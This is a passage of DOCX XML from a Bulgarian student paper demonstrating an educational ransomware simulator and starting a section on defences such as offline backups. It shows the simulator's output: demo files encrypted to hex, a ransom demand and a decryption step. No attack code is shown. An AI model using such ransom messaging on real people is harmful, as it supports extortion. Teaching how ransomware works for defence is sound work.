          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> в демото.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA8E587" w14:textId="77777777" w:rsidR="00AC7D80" w:rsidRDefault="00A568DA" w:rsidP="00A568DA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc224154937"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Демонстрация на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="02EE7F18" w14:textId="77777777" w:rsidR="00AC7D80" w:rsidRDefault="00AC7D80" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc224154938"/>
      <w:r>
        <w:t>Съдържание на текстовите файлове преди криптирането:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="0F2082C8" w14:textId="77777777" w:rsidR="00AC7D80" w:rsidRDefault="00AC7D80" w:rsidP="00AC7D80">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:keepNext/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC7D80">
        <w:t>This is my secret document with important information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196D091B" w14:textId="639178AF" w:rsidR="00AC7D80" w:rsidRDefault="00AC7D80" w:rsidP="00AC7D80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12</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BE7AB8" w14:textId="77777777" w:rsidR="00AC7D80" w:rsidRDefault="00AC7D80" w:rsidP="00AC7D80">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00AC7D80">
        <w:t>Another file with sensitive data that needs protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0C9927" w14:textId="150BE18A" w:rsidR="00AC7D80" w:rsidRDefault="00AC7D80" w:rsidP="00AC7D80">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr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13</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: document2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177DBEC5" w14:textId="3618231C" w:rsidR="00AC7D80" w:rsidRPr="00AC7D80" w:rsidRDefault="00AC7D80" w:rsidP="00AC7D80">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00AC7D80">
        <w:t>Personal notes and passwords (just kidding, this is a demo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C0AEC0" w14:textId="2FEA51E2" w:rsidR="00B23FDE" w:rsidRPr="00B23FDE" w:rsidRDefault="00AC7D80" w:rsidP="00B23FDE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14</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: notes.txt</w:t>
      </w:r>
      <w:r w:rsidR="00B23FDE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6A68F4" w14:textId="77777777" w:rsidR="00AC7D80" w:rsidRPr="00B23FDE" w:rsidRDefault="00AC7D80" w:rsidP="00AC7D80">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB3E1FA" w14:textId="0ABBD9BC" w:rsidR="00AC7D80" w:rsidRDefault="00AC7D80" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc224154939"/>
      <w:r>
        <w:t>Стартиране на демото:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="6AC71810" w14:textId="77777777" w:rsidR="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22:47:58 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>INFO  =</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=======================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F2FD1E" w14:textId="77777777" w:rsidR="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   RANSOMWARE SIMULATOR (Educational)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721C7C16" w14:textId="7CDB62CF" w:rsidR="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>========================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7F90BC" w14:textId="49D1489C" w:rsidR="00AC7D80" w:rsidRPr="00AC7D80" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:keepNext/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Press Enter to simulate attack...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD56F77" w14:textId="329AD30E" w:rsidR="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE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15</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Какво се визуализира първо на потребителя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169B8AD5" w14:textId="77777777" w:rsidR="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22:51:03 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>WARN  SIMULATING</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RANSOMWARE ATTACK...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6829D289" w14:textId="77777777" w:rsidR="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22:51:03 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>INFO  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ENCRYPTED] document1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277EC4B6" w14:textId="77777777" w:rsidR="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22:51:03 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>INFO  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ENCRYPTED] document2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454D4605" w14:textId="77777777" w:rsidR="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22:51:03 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>INFO  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ENCRYPTED] notes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408407BB" w14:textId="77777777" w:rsidR="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>22:51:03 ERROR ========================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24296993" w14:textId="77777777" w:rsidR="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>YOUR FILES HAVE BEEN ENCRYPTED!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C401AB" w14:textId="77777777" w:rsidR="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>Pay the ransom to recover your files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD3FE38" w14:textId="5C21FFD2" w:rsidR="00B23FDE" w:rsidRPr="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>========================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B862C1" w14:textId="77777777" w:rsidR="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pay now? (yes/no): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB15F6D" w14:textId="1A9038F4" w:rsidR="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE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16</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Симулация на атаката. Файловете са криптирани. Потребителят трябва да потвърди, че е заплатил.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0B05E4" w14:textId="77777777" w:rsidR="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:keepNext/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B23FDE">
        <w:t>2f0ba80edcf69430742e40ef970a177253163e83b1df0cf55b790bcd73f0959b1648c43caefd68b214ea1f6e16f50f80ef119ce88a1bf647ee8fd202ed0ce674b5be6ec4069d287f71e267c967d1000d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C0B042" w14:textId="4598095E" w:rsidR="00B23FDE" w:rsidRPr="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="00B23FDE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17</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document1.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> след криптирането</w:t>
      </w:r>
      <w:r w:rsidR="000A118C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E439C" w14:textId="77777777" w:rsidR="00B23FDE" w:rsidRDefault="00B23FDE" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00B23FDE">
        <w:t>8d4171026f8b8bfc0dbc4499590e8e70a52e62a622526462caa0c749f1dbd48d713c5dc3123751cf69b6d900e0f686da7a4ab9177a094bde6bdc22c8c4c930de5cd39fd133fa1d0c8b0186c8c7434d75</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0538F8F3" w14:textId="51152659" w:rsidR="00B23FDE" w:rsidRDefault="000A118C" w:rsidP="000A118C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18</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document2.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> след криптирането.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3983DBF5" w14:textId="77777777" w:rsidR="000A118C" w:rsidRDefault="00B23FDE" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00B23FDE">
        <w:t>2a26c3af01b7a5aad14a4c420b4ac559c120a940d49f048dd20290b018190722081e07e520108b1c635a94d054450b1243d7df61d0ced553cf9e9ca384b2da5962cc7792ba7fcab0ec25a15342ea3632</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D23E77E" w14:textId="3A50F560" w:rsidR="000A118C" w:rsidRPr="000A118C" w:rsidRDefault="000A118C" w:rsidP="000A118C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19</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: notes.txt </w:t>
      </w:r>
      <w:r>
        <w:t>след криптирането.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CADB0C2" w14:textId="77777777" w:rsidR="000A118C" w:rsidRDefault="000A118C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0E2841" w:themeColor="text2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4329950D" w14:textId="3236B45B" w:rsidR="000A118C" w:rsidRDefault="005853BC" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc224154940"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Потърпевшият </w:t>
      </w:r>
      <w:r w:rsidR="000A118C">
        <w:t>е заплатил откупа:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="3962AFE9" w14:textId="77777777" w:rsidR="000A118C" w:rsidRDefault="000A118C" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>Pay now? (yes/no): yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A03480D" w14:textId="77777777" w:rsidR="000A118C" w:rsidRDefault="000A118C" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22:59:07 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>INFO  Payment</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> confirmed. Decrypting files...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEFDC5D" w14:textId="77777777" w:rsidR="000A118C" w:rsidRDefault="000A118C" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22:59:07 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>INFO  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>DECRYPTED] document1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE593C2" w14:textId="77777777" w:rsidR="000A118C" w:rsidRDefault="000A118C" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22:59:07 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>INFO  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>DECRYPTED] document2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38624741" w14:textId="77777777" w:rsidR="000A118C" w:rsidRDefault="000A118C" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22:59:07 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>INFO  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>DECRYPTED] notes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3C81B7" w14:textId="2D5450EC" w:rsidR="000A118C" w:rsidRPr="000A118C" w:rsidRDefault="000A118C" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22:59:07 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>INFO  Decryption</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> complete!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7B6D74" w14:textId="77CCE74E" w:rsidR="000A118C" w:rsidRDefault="000A118C" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="Caption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20</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Файловете са възстановени</w:t>
      </w:r>
      <w:r w:rsidR="00B63754">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3862B215" w14:textId="77777777" w:rsidR="000A118C" w:rsidRDefault="000A118C" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D56904B" w14:textId="77777777" w:rsidR="000A118C" w:rsidRDefault="000A118C" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:keepNext/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC7D80">
        <w:t>This is my secret document with important information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEA5DB8" w14:textId="00D5BFBC" w:rsidR="000A118C" w:rsidRPr="000A118C" w:rsidRDefault="000A118C" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left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21</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> document1.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> след декриптирането.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061A38D5" w14:textId="77777777" w:rsidR="000A118C" w:rsidRDefault="000A118C" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00AC7D80">
        <w:t>Another file with sensitive data that needs protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370306D1" w14:textId="6B71D2CC" w:rsidR="000A118C" w:rsidRDefault="000A118C" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr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22</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document2.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> след декриптирането.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2945B0" w14:textId="77777777" w:rsidR="000A118C" w:rsidRPr="00AC7D80" w:rsidRDefault="000A118C" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00AC7D80">
        <w:t>Personal notes and passwords (just kidding, this is a demo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741924D8" w14:textId="23279507" w:rsidR="00470703" w:rsidRDefault="000A118C" w:rsidP="000A118C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr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23</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: notes.txt</w:t>
      </w:r>
      <w:r w:rsidR="004D689A">
        <w:t xml:space="preserve"> след декриптирането.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4751DFFA" w14:textId="77777777" w:rsidR="00470703" w:rsidRDefault="00470703">
      <w:pPr>
        <w:jc w:val="left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35BEDEDF" w14:textId="77777777" w:rsidR="00470703" w:rsidRDefault="00470703" w:rsidP="00470703">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc224154941"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>QR code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> към имплементацията:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="2023B49F" w14:textId="77777777" w:rsidR="00860839" w:rsidRDefault="00470703" w:rsidP="0047070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6A41F2E" wp14:editId="243BE0DF">
            <wp:extent cx="4763135" cy="4763135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="998859011" name="Picture 2" descr="QR Code Image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9011" name="Picture 2" descr="QR Code Image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B889" w14:textId="30971880" w:rsidR="00DE24B3" w:rsidRPr="00860839" w:rsidRDefault="00860839" w:rsidP="00860839">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860839">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00860839">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>При отваряне от компютър може да се достъпи чрез</w:t>
      </w:r>
      <w:r w:rsidR="009C5C68">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> кликване</w:t>
      </w:r>
      <w:r w:rsidRPr="00860839">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000243E1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>върху</w:t>
      </w:r>
      <w:r w:rsidRPr="00860839">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00860839">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QR code.</w:t>
      </w:r>
      <w:r w:rsidRPr="00860839">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A118C" w:rsidRPr="00860839">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DBB5CD" w14:textId="35D85B1F" w:rsidR="008D63F9" w:rsidRPr="00F01668" w:rsidRDefault="00DE24B3" w:rsidP="00F01668">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc224154942"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Стратегии и защита от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="7D9AA1E8" w14:textId="40D6CB74" w:rsidR="008D63F9" w:rsidRDefault="008D63F9" w:rsidP="00E173D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc224154943"/>
      <w:r>
        <w:t xml:space="preserve">Подготовка за </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> инциденти</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="2920F33F" w14:textId="37F0448C" w:rsidR="00C77792" w:rsidRDefault="00C77792" w:rsidP="00C77792">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Подготовката включва създаване и поддържане на офлайн криптирани резервни копия на критично важната информация, както и редовна проверка на тяхната изправност. От съществено значение е резервните копия да се съхраняват офлайн, тъй като повечето ransomware атаки се опитват да открият и унищожат или криптират наличните архиви на системата, с което принуждават потърпевшия да плати откуп.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7020861C" w14:textId="2C67260E" w:rsidR="00C77792" w:rsidRDefault="00C77792" w:rsidP="00C77792">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Важно е също така да се поддържат актуални </w:t>
      </w:r>
      <w:r w:rsidR="000C491F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>images</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на системата със предварително конфигурирана операционна система и съответните софтуерни приложения. Това значително улеснява и ускорява възстановяването и повторното пускане в експлоатация на системата след атака.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396989A8" w14:textId="54B3C4D8" w:rsidR="002566EA" w:rsidRPr="007318EC" w:rsidRDefault="00C77792" w:rsidP="00C77792">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
